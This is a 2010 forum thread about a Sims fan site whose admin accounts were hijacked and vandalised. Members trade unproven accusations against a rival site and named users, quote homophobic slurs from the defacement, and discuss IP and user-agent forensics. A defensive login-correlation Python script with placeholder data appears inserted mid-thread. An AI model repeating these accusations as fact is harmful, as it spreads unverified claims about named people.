More Awesome Than You!

TS3/TSM: The Pudding => The World Of Pudding => Topic started by: Scotty on 2010 January 08, 12:09:44



Title: GSC has been hacked
Post by: Scotty on 2010 January 08, 12:09:44
Well, I just found out that the Gay Sims Club has been hacked and deleted. I do not know if it can be restored. Someone changed the name to Gay Fags Club. I am deviststed. I put years of work into that site. And I am beyond upset. I'd love to know who did it. But I won't hold my breath. I'm just numb.


Title: Re: GSC has been hacked
Post by: Scotty on 2010 January 08, 13:27:09
The fuckers. I am restoring my site now. I'm glad I have a good hosting service, but if I EVER find out who hacked my site, I will hunt him/it down and fuck them up!


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 08, 13:32:23
My guess would be that it was an unrelated random Internet hacking performed by script kiddies. You need to update your stuff more and avoid using software and plugins you don't understand.


Title: Re: GSC has been hacked
Post by: Tikkititi on 2010 January 08, 13:41:02
Well, I just found out that the Gay Sims Club has been hacked and deleted. I do not know if it can be restored. Someone changed the name to Gay Fags Club. I am deviststed. I put years of work into that site. And I am beyond upset. I'd love to know who did it. But I won't hold my breath. I'm just numb.

Understandable. If that happened to me, I'd not just be deviststed, I'd be tottimented. Utterly musherable.

However, I doubt even my deep dipsolation would drive me to double posting. Get a hold of yourself.


Title: Re: GSC has been hacked
Post by: Scotty on 2010 January 08, 13:45:35
Did I double post? Sorry. I was posting from my iPod. The GSC has been around for several years, and this is my first hacking. But hey, it's been fixed. And Pes, the only mods I have on my forum are official add-ons from Invision. I update the software as much as I can. Or, as much as Invision updates their software.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 08, 13:50:49
And Pes, the only mods I have on my forum are official add-ons from Invision. I update the software as much as I can. Or, as much as Invision updates their software.
Being official doesn't mean it ain't crap. And ultimately, shit happens. If a new breaking exploit just emerged, they may not have officially resolved it yet, so expect a wave of attacks on boards running that software. I wouldn't really call this a deep and particularly meaningful event. This is just typical Internet shit, you get used to this.


Title: Re: GSC has been hacked
Post by: Scotty on 2010 January 08, 14:02:46
I'm used to it. I'm sure it's just some random moron that thought he could put one over on some random site. I got called a Pirate Fag, so that's a bonus. :)


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 08, 14:12:26
...oh, a PIRATE fag now? See, that's a new wrinkle. Tell me more about this. I revise my previous opinion. I no longer believe this to be entirely random, and now suspect TSR involvement.


Title: Re: GSC has been hacked
Post by: Scotty on 2010 January 08, 14:27:50
Well, they deleted almost everything, all the posts, members and renamed the forum to the Gay Pirate Fag Club. I made a fake name and went in there to see what was going on, and someone that was signed in as me PMed me and called me a Gay Pirate Fag. And that's all he said. One of my members said it's probably TSR.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 08, 14:42:04
I concur with this assessment. The MO of the attack implies that it was performed by someone of low technical skills, but possessing privileged information obtained by some means, and a directed motive. A random attack would not have specifically attacked on a member-and-post-level, but instead, would have simply just dropped all the DB tables and left the site completely inoperable, and/or defaced the front page. The fact that the underlying data was not wiped or replaced by a defaced page indicates that the attacker did not have the technical skills needed to perform such an act. So, indubitably a TSR attack.


Title: Re: GSC has been hacked
Post by: Anach on 2010 January 08, 16:10:55
Cannot argue with logic like that!


Title: Re: GSC has been hacked
Post by: Fat D on 2010 January 08, 16:16:32
Well, they deleted almost everything, all the posts, members and renamed the forum to the Gay Pirate Fag Club. I made a fake name and went in there to see what was going on, and someone that was signed in as me PMed me and called me a Gay Pirate Fag. And that's all he said. One of my members said it's probably TSR.
So your site is a "Jolly Buccaneer Cigarette Bludgeon"?


Title: Re: GSC has been hacked
Post by: Scotty on 2010 January 08, 16:55:20
Well, I've never really made it a secret that I despise TSR. I can think of a couple people that hate me enough to do that. But fuck 'em. I've worked too hard on the GSC, and even if I couldn't save it, I'd bring it back in some form. I'm not going to let some fuckin' idiot run me off.


Title: Re: GSC has been hacked
Post by: ShortyBoo on 2010 January 08, 18:23:30
I wouldn't be surprised if TSR was the culprit, considering the things they've done in the past. The use of the word "pirate" also supports the theory since TSR loves calling people pirates like it's a bad thing. They called the people on the list they stole from that petition pirates too.


Title: Re: GSC has been hacked
Post by: Zazazu on 2010 January 08, 18:27:58
I concur with this assessment. The MO of the attack implies that it was performed by someone of low technical skills, but possessing privileged information obtained by some means, and a directed motive. A random attack would not have specifically attacked on a member-and-post-level, but instead, would have simply just dropped all the DB tables and left the site completely inoperable, and/or defaced the front page. The fact that the underlying data was not wiped or replaced by a defaced page indicates that the attacker did not have the technical skills needed to perform such an act. So, indubitably a TSR attack.
Hm. Atwat, perhaps? I'd generally think it beyond her ken, but it's the sort of lowball attack she'd love to do.


Title: Re: GSC has been hacked
Post by: dragonballz on 2010 January 09, 03:03:06
I'm beginning to think that T$R is run by a staff of twelves akin to the Oompa Loompas in Willy Wonka. Emerald-haired, tangerine-skinned, pirate-chanting twelves. With mullets. Bad mullets.


Title: Re: GSC has been hacked
Post by: Scotty on 2010 January 09, 04:13:11
I wish I would have gotten some screen shots of this, but my only thought was getting my forum working again.

And Oompa Loompas were the good guys. I was thinking more along the lines of winged monkeys from The Wizard of Oz.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 09, 05:20:26
And Oompa Loompas were the good guys. I was thinking more along the lines of winged monkeys from The Wizard of Oz.
I dunno, man. (http://www.youtube.com/watch?v=gsE0UOz1uw4) Those Wonkans are pretty disturbing.


Title: Re: GSC has been hacked
Post by: Witchboy on 2010 January 11, 04:55:27
More info forthcoming...

It seems that while they were busy hacking GSC they were also hacking into my account on Simvention at or around the same time. This has been confirmed by Nei. They soft-deleted all my creations and changed my e-mail & password. Nei is working on getting my account back up so I can get in and change the e-mail & password.

From Nei on MSN

Quote
Bill said:
Hi Nei Nei!! I can't log into Simvention and it seems everything in my section has been deleted

Isilme :: at work says:
Looks like someone soft-deleted your threads. The email you used for Simv wasn't **** @ aol .com, was it?

Bill said:
No, it wasn't

Isilme :: at work says:
It might have been that someone hacked into your account then :/ I've taken a look and the threads have been deleted by your own account. The IP address is: 83.170.113.97. The host name is: server52555.uk2net.com.

I can help change the email back and then you can try to reset your password?

Bill says:
OK please, ty :)
That's not my IP

Bill says:
*Is there a date on when they removed my downloads? And when they were logged in?

Isilme :: at work says:
4:43, 8th Jan 2010
Around that time
But it might be set to my local time. I'm at GMT+8


Title: Re: GSC has been hacked
Post by: Mirelly on 2010 January 11, 10:21:18
Are we talking about "hard" hacking here, where an evil genius gets by the host server's security to wreak havoc? Or maybe it was a case of "soft" hacking, where some fuckwit lucked out on a less than secure password? Passwords should always be at least 8 characters long and contain a mixture of upper and lower case letters plus one or more numerals. One should also avoid using the same password for multiple applications, and never use the same password to protect strictly personal activity (banking, for example) and interwebs tomfoolery like forum usage. Changing passwords often should not be regarded as optional.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 11, 11:59:57
This looks like the typical soft case, following the MO of all previous TSR-linked hackings: compromise of a specific user's password followed by application-level vandalism on multiple connected sites. It's not very sophisticated and demonstrates little foresight, planning, or skill.


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 11, 13:06:40
How are they linked to TSR?

Have Witchboy and/or Scotty used the same password as for an account on TSR, and has that password not changed in a year or so?
Maybe Scotty could try and dig out the IP address from the server log to see if it matches the one used to "hack" Witchboy's account?
The user agent string could also be interesting to compare (though I think our "hacker" has learned to hide it by now).

This really should go without saying, but just for the record, TSR don't "hack" or in other ways mess up other websites.
We don't feel we need to destroy things, there's plenty of space out there :)


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 11, 13:38:28
This really should go without saying, but just for the record, TSR don't "hack" or in other ways mess up other websites.
We don't feel we need to destroy things, there's plenty of space out there :)
Well, YOU probably don't. But like I've mentioned to you in the past, you've got at least one rogue operator, and you never caught him. Given that the rogue operator responsible for the initial leak was never actually caught, it is reasonable to believe he remains at large and continues to supply the person(s) responsible, even if he isn't specifically that person.


Title: Re: GSC has been hacked
Post by: Witchboy on 2010 January 11, 14:02:10
How are they linked to TSR?

Have Witchboy and/or Scotty used the same password as for an account on TSR, and has that password not changed in a year or so?
Maybe Scotty could try and dig out the IP address from the server log to see if it matches the one used to "hack" Witchboy's account?
The user agent string could also be interesting to compare (though I think our "hacker" has learned to hide it by now).

This really should go without saying, but just for the record, TSR don't "hack" or in other ways mess up other websites.
We don't feel we need to destroy things, there's plenty of space out there :)

No, Scotty & I both don't use the same password or even the same accounts anywhere, let alone TSR. The IP used to hack into both GSC & SV was through a proxy server.

Screenshot courtesy of Coconut.

(http://i896.photobucket.com/albums/ac163/witchboy1962/Screenshots/ea1ris.jpg)



Title: Re: GSC has been hacked
Post by: Johan on 2010 January 11, 14:03:57
Well, YOU probably don't. But like I've mentioned to you in the past, you've got at least one rogue operator, and you never caught him. Given that the rogue operator responsible for the initial leak was never actually caught, it is reasonable to believe he remains at large and continues to supply the person(s) responsible, even if he isn't specifically that person.
IF there is a rogue operator somewhere within TSR then I would certainly want him/her caught. If Witchboy or Scotty have any more detail about this I would like to know.
A good start would be to find out if they have used a password that has also been used on TSR.
We changed to hashed passwords about a year ago, so even if someone with database access (that is, one of the 5 owners, me included) were a rogue operator, all he could supply is a password that needs to be brute forced.

If you by initial leak refer to the Buggybooz incident, I have also told you before that I think that was someone on your side, given the actual evidence we had.

Since we repeatedly get the blame for stuff like this, I would like to help investigate this.
 


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 11, 14:06:10
No, Scotty & I both don't use the same password or even the same accounts anywhere, let alone TSR. The IP used to hack into both GSC & SV was through a proxy server.
I might have worded that a little wrong; I meant did you have the same password as an account on TSR? (Nothing to do with Scotty.)


Title: Re: GSC has been hacked
Post by: Scotty on 2010 January 11, 14:10:26
I do have an account with TSR, but I haven't logged into that place in several years. I do know that I don't have the same password there. And I have changed my Admin password at the GSC. I am also the only one that has access to my database. (Which has a different password than what I use anywhere else.)


Title: Re: GSC has been hacked
Post by: Witchboy on 2010 January 11, 14:16:21
I might have worded that a little wrong; I meant did you have the same password as an account on TSR? (Nothing to do with Scotty.)

I really don't remember what my password was on SV. I hadn't logged into SV in quite a while. All I know is I can't get in to change it now. As for a TSR password, the one I have now was most probably not the same as my SV password but a variation of it.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 11, 15:46:53
If you by initial leak refer to the Buggybooz incident, I have also told you before that I think that was someone on your side, given the actual evidence we had.
Seems unlikely, given that everyone on this side of the community is using stock board software that hashes passwords, and nobody else would have the technical ability to change that. The attacker's MO is very consistent, however, and demonstrates a slight iterative refinement with each subsequent attack, which makes it very much appear to be the same attacker, rather than a copycat.


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 11, 16:00:37
Hang about, what on earth has Coconut got to do with GSC?  I mean, how come *she* was able to produce these details, rather than the person whose site it is (ie you)?  What is that a screenshot of, exactly?


Title: Re: GSC has been hacked
Post by: Scotty on 2010 January 11, 16:20:54
That IP was provided to Witchy from one of the Mods at Sim Vention. He gave that IP to Coconut, and she did a search on it. That screenshot is what she found. I got that same IP when I did a search on my site.


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 11, 16:30:15
What sort of search on your site?  Why did you pick that particular IP as being the one that had caused the problem?


Title: Re: GSC has been hacked
Post by: Scotty on 2010 January 11, 16:50:24
Well, Witchboy's account was hacked at Sim Vention. That IP was associated with Witchy's account at the time of the hacking. And that same IP came up at my site. Both incidents happened at the same time.


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 11, 17:13:52
That IP was associated with Witchy's account at the time of the hacking.

What you are saying is that someone from that IP was using Witchy's account?   And was someone from that IP using your account at the time you were hacked?   Was that IP associated with any other account on either of your sites, ever?

It's lucky you were both taking a backup at the very moment your sites were being hacked, or you would never have known which IP was logged into your account at the time, seeing as they deleted the whole lot.   One thing I am still confused about though is where did they make the name change, seeing as all the data (presumably including the text that holds the name of your site) was deleted?



Title: Re: GSC has been hacked
Post by: Zazazu on 2010 January 11, 17:57:02
Johan, if there's anyone at TSR I'd believe not to have destructive motives, it's you. That's not saying much. I think you've chosen to pull the wool over your eyes. You need to have an in-depth talk with your brother. If you really want to find out who in your organization might be orchestrating these attacks, you need to start with the person who provided Thomas with the hacked lists of names and emails from the epetition.

References:
http://tsr.mustbedestroyed.org/?p=858
http://www.petitiononline.com/mod_perl/signed.cgi?EANOTOK1


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 11, 18:00:38
I have searched for that IP in our login log at TSR and came up empty.
It's interesting that both accounts were hacked by what seems to be the same person, this could make it a little easier to figure out if you could find the lowest common denominator.
It's probably not smart to list all sites where you might have used those passwords in public before you have changed them on those sites (if any) but that could give a lead.
To carefully examine the webserver logs for around the time of the attacks could also give something.

If you're using webmail you might want to consider changing the password and see if you can list the logins to it.


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 11, 18:09:34
Johan, if there's anyone at TSR I'd believe not to have destructive motives, it's you. That's not saying much. I think you've chosen to pull the wool over your eyes. You need to have an in-depth talk with your brother. If you really want to find out who in your organization might be orchestrating these attacks, you need to start with the person who provided Thomas with the hacked lists of names and emails from the epetition.

References:
http://tsr.mustbedestroyed.org/?p=858
http://www.petitiononline.com/mod_perl/signed.cgi?EANOTOK1
I have talked to my brother. I know him far better than anyone else here (or anywhere else for that matter), and just because I choose to believe him based on what I know doesn't mean I'm pulling wool over my eyes.
Thomas has not received any hacked petition list; that was probably just another stunt by Coconut. I actually think she said Thomas gave it to Atwa, has she changed the story now?


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 11, 18:19:41
I am not willing to condemn someone merely for "Receiving Dox", which I do not believe qualifies as an atrocity in and of itself, and there is no evidence that this list was ever distributed anywhere, based on its relative worthlessness on a strategic level. On the other hand, while you may be entirely willing to vouch for your own brother, I highly doubt you are willing to vouch for the character of Atwa, who is, even by TSR standards, slimy, underhanded, and untrustworthy.

Conversely, while I'm sure you don't care for Coconut at all, I know that Coconut simply does not have the technical ability, the opportunity, or the access needed to acquire this particular list ex nihilo. Someone from TSR enabled this list to be acquired, even if nothing was done about it, and TSR was very quick to deny responsibility for anything involving said list even before the fingers had been pointed. And the fact remains, you DO have a rogue operator and he IS still at large.


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 11, 22:02:14
I am not willing to condemn someone merely for "Receiving Dox", which I do not believe qualifies as an atrocity in and of itself, and there is no evidence that this list was ever distributed anywhere, based on its relative worthlessness on a strategic level. On the other hand, while you may be entirely willing to vouch for your own brother, I highly doubt you are willing to vouch for the character of Atwa, who is, even by TSR standards, slimy, underhanded, and untrustworthy.

Conversely, while I'm sure you don't care for Coconut at all, I know that Coconut simply does not have the technical ability, the opportunity, or the access needed to acquire this particular list ex nihilo. Someone from TSR enabled this list to be acquired, even if nothing was done about it, and TSR was very quick to deny responsibility for anything involving said list even before the fingers had been pointed. And the fact remains, you DO have a rogue operator and he IS still at large.
You're correct in that I'm not willing to vouch for Atwa; I barely know her. What she does or doesn't do is completely on her own.
I haven't seen anything at all that supports the theory that someone from TSR enabled the list to be acquired.
You sound very certain; do you know something about it that I don't?

Given the purpose of the petition, I would imagine someone from TSR would be the last person to get access to it.
I believe it was established that the password was not from TSR in this case too?

You're wrong about when we denied responsibility; that was done after Coconut had accused us of it, a couple of days after if I remember correctly.
You're probably right about Coconut not having the technical assets to get access to the petition by some kind of hack, though.
Would it be very unlikely that someone just gave it to her? She could at least put it to some use.

You seem to be quite sure about the rogue TSR operator, and while I won't completely disregard that possibility there is reason to look elsewhere too. Especially considering what was found when Delphy and I investigated the Buggybooz incident: there was a very distinct trail leading elsewhere.

Either way I would certainly want to know based on things that can be verified and not just theories.
It should be possible to find out if an email also used on TSR that has the same/similar password could have been used to recover a password, for example.
In that case it might be possible to get a list of previous logins to see from what IP they came (at least if it's webmail).


Title: Re: GSC has been hacked
Post by: Witchboy on 2010 January 11, 23:12:55
That IP was associated with Witchy's account at the time of the hacking.

What you are saying is that someone from that IP was using Witchy's account?   And was someone from that IP using your account at the time you were hacked?   Was that IP associated with any other account on either of your sites, ever?

It's lucky you were both taking a backup at the very moment your sites were being hacked, or you would never have known which IP was logged into your account at the time, seeing as they deleted the whole lot.   One thing I am still confused about though is where did they make the name change, seeing as all the data (presumably including the text that holds the name of your site) was deleted?


I had no idea about SV being hacked into until yesterday, when I tried to log in over there. I contacted Nei via MSN. She checked SV for me & found the info I posted earlier. I immediately told Scotty. SV is not mine or Scotty's site. Destin owns SV, which btw will be gone after this month. Destin is nowhere to be found & Nei has limited access. The hacking into SV was done via my account, as Nei stated in my earlier post. No one on SV or GSC was taking backups of anything during the hackings.

I am a creator and moderator on both SV & GSC. Scotty is Admin on GSC & just a regular member on SV. The IP used to attack GSC is the same IP that went in on SV & changed all my info & soft-deleted my creations.

As for the motive of both sites being hit: I am pro-pirate/file-share friendly. Scotty and GSC are pro-pirate/file-share friendly. SV is pro-pirate/file-share friendly. Plus the TWAT has had it in for me ever since she busted me on Sims File Vault for file sharing.


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 11, 23:25:35
There was also apparently an anti-gay element to the GSC hack (the name change), so it would be interesting to look back at anything ATWA has posted and see if that fits her persona.  Normally women are more tolerant of male homosexuality than men, especially very young ones.


Title: Re: GSC has been hacked
Post by: rufio on 2010 January 12, 01:13:55
Yes, but this is Atwa we're talking about.


Title: Re: GSC has been hacked
Post by: Scotty on 2010 January 12, 01:38:08
I must live under a rock, because I've never heard of ATWA before this all happened.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 12, 01:38:19
Given the purpose of the petition, I would imagine someone from TSR would be the last person to get access to it.
I believe it was established that the password was not from TSR in this case too?
I don't believe anything was really firmly established about the passwords in this case, because the person in question has been dead for a very long time and this event was roughly contemporaneous with the original Buggybooz incident, IIRC.

You're wrong about when we denied responsibility; that was done after Coconut had accused us of it, a couple of days after if I remember correctly.
You're probably right about Coconut not having the technical assets to get access to the petition by some kind of hack, though.
Would it be very unlikely that someone just gave it to her? She could at least put it to some use.
Unlikely, given that I have explicitly ordered no such actions be taken. It would serve absolutely no purpose, given that, from a strategic standpoint, such an act has no value.

You seem to be quite sure about the rogue TSR operator, and while I won't completely disregard that possibility there is reason to look elsewhere too. Especially considering what was found when Delphy and I investigated the Buggybooz incident: there was a very distinct trail leading elsewhere.
There wasn't so much a "distinct trail leading elsewhere" as a "lack of smoking gun". Delphy is unwilling to do anything without a level of proof suitable for a legal prosecution. As we are not interested in legal prosecution, we simply don't need that. It is enough that I recognize the signs. The information used could not really have come from anywhere else, and you have already admitted that the information was stored in a form that was easily accessible. Such attacks in the community had been completely unheard of until that point, and the fact that attacks of the same pattern continue to appear sporadically following that incident suggests that the list continues to be in use, even if it is not being updated anymore.

Either way I would certainly want to know based on things that can be verified and not just theories.
It should be possible to find out if an email also used on TSR that has the same/similar password could have been used to recover a password, for example.
In that case it might be possible to get a list of previous logins to see from what IP they came (at least if it's webmail).
Sure, it would be "possible" to find out. All you have to do is hit the "lost password" button on any website, and most standard software will contact the email with a reset link. You know this, I know this, everyone knows this. Of course, unless you want to hack someone's account merely to prove an obvious, known fact, this line of inquiry serves no useful purpose.


Title: Re: GSC has been hacked
Post by: Grimma on 2010 January 12, 08:05:37
May I just note that the fact that Johan came white-knighting as soon as whispers of "Hey, this reminds me of that incident in 200whatever, remember that, we still think that was TSR based on what we know, this looks very much like that did" started has completely reassured me that there is, in fact, no TSR involvement. At all. Because they said so. Definitely. Just like last time. And the time before that. And the time before that.


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 12, 22:53:26
I don't believe anything was really firmly established about the passwords in this case, because the person in question has been dead for a very long time and this event was roughly contemporaneous with the original Buggybooz incident, IIRC.

So the link to TSR would be that Bluesoup had an account at TSR with the same password as for the petition, and that password was leaked somehow in the same way as for Buggybooz?

First of all I find it hard to believe Bluesoup used the same password as on TSR for a petition against EA's collaboration with TSR.
Even if she did, you would have to know the secret part of the URL in order to log in and manage the petition. This URL is only sent to the petition author.

This means the rogue operator also had access to Bluesoup's email, or that she willingly shared that URL with someone and that someone passed it on to the operator.
I find it unlikely she used the same password for her email as on TSR. (If she indeed has or has had an account on TSR; I can't find an account named Bluesoup or one that uses the email used in the petition.)

From what I can gather by googling this, Bluesoup claimed the petition was "hacked" March 18 or earlier; the Buggybooz incident happened March 30.

Unlikely, given that I have explicitly ordered no such actions be taken. It would serve absolutely no purpose, given that, from a strategic standpoint, such an act has no value.
Does this mean you knew the petition had leaked and you ordered Coconut or anyone else not to do anything with it, or what?

I'd say it suits your purpose perfectly from a strategic standpoint. Isn't the general consensus that TSR was behind the petition leak and is now spreading it around/uses it for evil purposes?
That surely has a lot of value in the anti-TSR camp.


There wasn't so much a "distinct trail leading elsewhere" as a "lack of smoking gun". Delphy is unwilling to do anything without a level of proof suitable for a legal prosecution. As we are not interested in legal prosecution, we simply don't need that. It is enough that I recognize the signs. The information used could not really have come from anywhere else, and you have already admitted that the information was stored in a form that was easily accessible. Such attacks in the community had been completely unheard of until that point, and the fact that attacks of the same pattern continue to appear sporadically following that incident suggests that the list continues to be in use, even if it is not being updated anymore.
There was a pretty distinct trail, in case you forgot here's what we found when investigating it (using data from both TSR and MTS):

Quote from: Johan on PMBD
Whoever was behind this must have known what username buggybooz had on TSR and that was not well known in the community. Her account on TSR was logged in to by someone with exactly the same user agent string (which were not a very common one, i compared it to other logins in our login history and it was fairly unique) and an IP that was the same or was in the same range as was used on s2c (Hide my IP), slightly after the hacking took place on MTS.
That same signature also:
* logged in as "hamilton" on MTS (that's Thomas account on there)
* logged in as "sherriesim" on MTS, both with Hide my IP and unproxied IP's
* logged in as "leftywillnot" on TSR
* logged in to a bunch of FA accounts and removed a lot of files

In the list of IP's Atwa got from the service provider when she found out someone had been reading her email we were able to match them to the unproxied IP's of sherriesim. Unfortunately we didn't get the user agent from that list but i have a very strong suspicion that it would have matched the hackers signature.

We clearly have a very different POV.
From where I stand this is a smoking gun, and it doesn't fit with your idea of a rogue TSR operator.
The person behind the Buggybooz incident didn't get caught so he/she could possibly have been behind other hackings.

Sure, it would be "possible" to find out. All you have to do is hit the "lost password" button on any website, and most standard software will contact the email with a reset link. You know this, I know this, everyone knows this. Of course, unless you want to hack someone's account merely to prove an obvious, known fact, this line of inquiry serves no useful purpose.
That isn't what I meant. It should be possible to find out exactly how it works in the case of Scotty and Witchboy without any kind of hacking.
I.e., would it be possible, just by knowing their email address, to gain access and "hack" their accounts?
If the answer is no then there is no link whatsoever to TSR.


Title: Re: GSC has been hacked
Post by: J. M. Pescado on 2010 January 13, 10:00:55
So the link to TSR would be that Bluesoup had an account at TSR with the same password as for the petition and that password was leaked somehow in the same way as for Buggybooz?

First of all, I find it hard to believe Bluesoup used the same password as on TSR for a petition against EA's collaboration with TSR.
Are you kidding? This is BLUESOUP. BlueSoup is a fatheaded idiot. I mean, what do you expect from someone who starts e-Petitions? Everyone with half a brain knows those are utterly worthless. Hell, it's already been firmly debunked on Snopes.

Even if she did you would have to know the secret part of the URL in order to log in and manage the petition. This URL is only sent to the petition author.
I don't know how "secret" such a URL is, but the Fathead would be dumb enough to lose her email that way, yes.

From what I can gather by googling this, Bluesoup claimed the petition was "hacked" March 18 or earlier; the Buggybooz incident happened March 30.
Like I said, roughly contemporaneous. I distantly recall them as events that occurred within the same year only, and wasn't even sure which came first, but you have nicely put a date on them that has them separated by less than 2 weeks, which rather tightens the association between these two events nicely!

Does this mean you knew the petition had leaked and you ordered coconut or anyone else not to do anything with it, or what?
No, it means that I have explicitly ordered people NOT to perform any such false-flag operations or actual hackings.

I'd say it suits your purpose perfectly from a strategic standpoint. Isn't the general consensus that TSR was behind the petition leak and is now spreading it around/uses it for evil purposes?
That surely has a lot of value in the anti TSR camp.
Actually, at the time, the petition being hacked was mostly blamed on BlueSoup's incompetence and not specifically linked to TSR. In fact, the origin of the name list wasn't even resolved until later. The petition thing had been really entirely blown off and forgotten about within days, as no real proof was ever found, and besides, those things are stupid as hell. What brought it back to light was the fact that the list was intercepted circulating the halls of TSR. At first, it was speculated that it was a selected list from TSR's database again, something that TSR issued a suspiciously quick denial of, but this idea never really gained traction and pretty much died out instantly after the BlueSoup Petition Theory was proposed.

There was a pretty distinct trail, in case you forgot here's what we found when investigating it (using data from both TSR and MTS):
If by "trail", you mean "the IP of a public proxy service", which coincidentally happened to match someone who was also probably a user of that network...totally meaningless, really. The ONE trend of this is that the attacker ALWAYS uses proxy SERVICES, never simply open proxies scanned from the open Internet. It's always some kind of known service provider of proxies, as opposed to the many unknown random proxies dotting the Internet. Other than that, not much of a trail, except that it tells us the attacker does not have the technical ability or interest to scan for his own proxies, and may even be paying money for access to these proxies.
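Johan's login-history correlation quoted above (one rare user agent plus one proxy range appearing across several accounts, then unproxied hits for a single account carrying the same user agent) is the kind of check a forum operator can script against their own authentication log. The block below is an added example written for this thread, not code from TSR, MTS or any forum package; the log records, IP ranges and user-agent strings in it are constructed placeholders, and the `max_accounts` threshold is an assumption.

```python
"""Correlating login records by user agent and source network.

Added example for this thread; not code from TSR, MTS or any forum
package. The login records, address ranges and user-agent strings
below are constructed placeholders, not real indicators.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed sample login log: (timestamp, site, account, source IP, user agent).
LOGINS = [
    ("2009-03-30T01:02:00", "siteA", "alice", "198.51.100.7",  "Mozilla/4.0 (compatible; ExampleBrowser 1.0)"),
    ("2009-03-30T01:10:00", "siteA", "bob",   "198.51.100.9",  "Mozilla/4.0 (compatible; ExampleBrowser 1.0)"),
    ("2009-03-30T01:15:00", "siteB", "carol", "198.51.100.12", "Mozilla/4.0 (compatible; ExampleBrowser 1.0)"),
    ("2009-03-30T02:00:00", "siteB", "carol", "203.0.113.40",  "Mozilla/4.0 (compatible; ExampleBrowser 1.0)"),
    ("2009-03-29T18:00:00", "siteB", "carol", "203.0.113.40",  "Mozilla/5.0 (Windows; CommonBrowser 3.0)"),
    ("2009-03-29T19:00:00", "siteA", "dave",  "192.0.2.5",     "Mozilla/5.0 (Windows; CommonBrowser 3.0)"),
    ("2009-03-29T20:00:00", "siteA", "erin",  "192.0.2.77",    "Mozilla/5.0 (Windows; CommonBrowser 3.0)"),
    ("2009-03-29T21:00:00", "siteB", "frank", "192.0.2.99",    "Mozilla/5.0 (Windows; CommonBrowser 3.0)"),
]

# Constructed: address ranges treated as belonging to a known commercial proxy service.
PROXY_RANGES = [ip_network("198.51.100.0/24")]


def is_proxy(ip):
    """True when the source address falls inside a known proxy-service range."""
    addr = ip_address(ip)
    return any(addr in net for net in PROXY_RANGES)


def ua_account_counts(logins):
    """Number of distinct (site, account) pairs each user agent string logged in to."""
    seen = defaultdict(set)
    for _, site, account, _, ua in logins:
        seen[ua].add((site, account))
    return {ua: len(accounts) for ua, accounts in seen.items()}


def rare_signatures(logins, max_accounts=3):
    """Group logins whose user agent was used for only a few accounts.

    A user agent seen on hundreds of accounts is just a popular browser and
    links nothing; one seen on a handful of accounts in one window is a
    signature worth reviewing. max_accounts is an assumed threshold.
    """
    counts = ua_account_counts(logins)
    groups = defaultdict(list)
    for ts, site, account, ip, ua in logins:
        if counts[ua] <= max_accounts:
            groups[ua].append(
                {"time": ts, "site": site, "account": account, "ip": ip, "via_proxy": is_proxy(ip)}
            )
    return dict(groups)


def unproxied_leads(logins, max_accounts=3):
    """Within rare-signature groups, keep only logins from non-proxy addresses.

    A shared proxy IP by itself links nobody (anyone can use the service);
    a non-proxy address paired with the same rare signature is the lead an
    investigator follows up. Returns (account, ip, user_agent) tuples.
    """
    leads = []
    for ua, events in rare_signatures(logins, max_accounts).items():
        for e in events:
            if not e["via_proxy"]:
                leads.append((e["account"], e["ip"], ua))
    return leads


if __name__ == "__main__":
    for ua, events in rare_signatures(LOGINS).items():
        print("rare signature:", ua)
        for e in events:
            print("  ", e)
    print("unproxied leads:", unproxied_leads(LOGINS))
```

On the constructed log the rare signature is the `ExampleBrowser` agent, seen on three accounts through the proxy range and once from a non-proxy address for `carol`, which is the shape of the trail Johan describes. The result is a lead to review, not proof: as Pescado notes, a public proxy service is shared by unrelated people, and a user agent string can be set to anything.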


Title: Re: GSC has been hacked
Post by: Inge on 2010 January 13, 15:02:54
Quote
* logged in as "hamilton" on MTS (that's Thomas's account on there)
* logged in as "sherriesim" on MTS, both with Hide my IP and unproxied IPs
* logged in as "leftywillnot" on TSR
* logged in to a bunch of FA accounts and removed a lot of files

Looks like it could have been Thomas himself then?


Title: Re: GSC has been hacked
Post by: Johan on 2010 January 13, 15:56:01
I don't know how "secret" such a URL is, but the Fathead would be dumb enough to lose her email that way, yes.
It looks like this:
http://www.petitiononline.com/PMBDMBD/RUngyNUKAePJ.cgi
RUngyNUKAePJ being the secret part.
Feel free to sign my test petition by the way.
I don't know Bluesoup, but I very much doubt she would give login details to the petition to someone on our side.

Like I said, roughly contemporaneous. I distantly recall them as events that occurred within the same year only, and wasn't even sure which came first, but you have nicely put a date on them that has them separated by less than 2 weeks, which rather tightens the association between these two events nicely!
It is interesting that the events happened around the same time yes.

No, it means that I have explicitly ordered people NOT to perform any such false-flag operations or actual hackings.
I don't know what constitutes a false flag operation but if it includes deliberately spreading false propaganda you should have a talk with Coconut again because it obviously didn't stick.

If by "trail", you mean "the IP of a public proxy service", which coincidentally happened to match someone who was also probably a user of that network...totally meaningless, really. The ONE trend of this is that the attacker ALWAYS uses proxy SERVICES, never simply open proxies scanned from the open Internet. It's always some kind of known service provider of proxies, as opposed to the many unknown random proxies dotting the Internet. Other than that, not much of a trail, except that it tells us the attacker does not have the technical ability or interest to scan for his own proxies, and may even be paying money for access to these proxies.
The use of a specific proxy service alone doesn't say much, but combined with the rather unique user agent and the timeline of events it makes the trail pretty distinct.
There were also non-proxy IPs that had the same signature (same user agent, and the account had been accessed by the same proxy service).

Quote
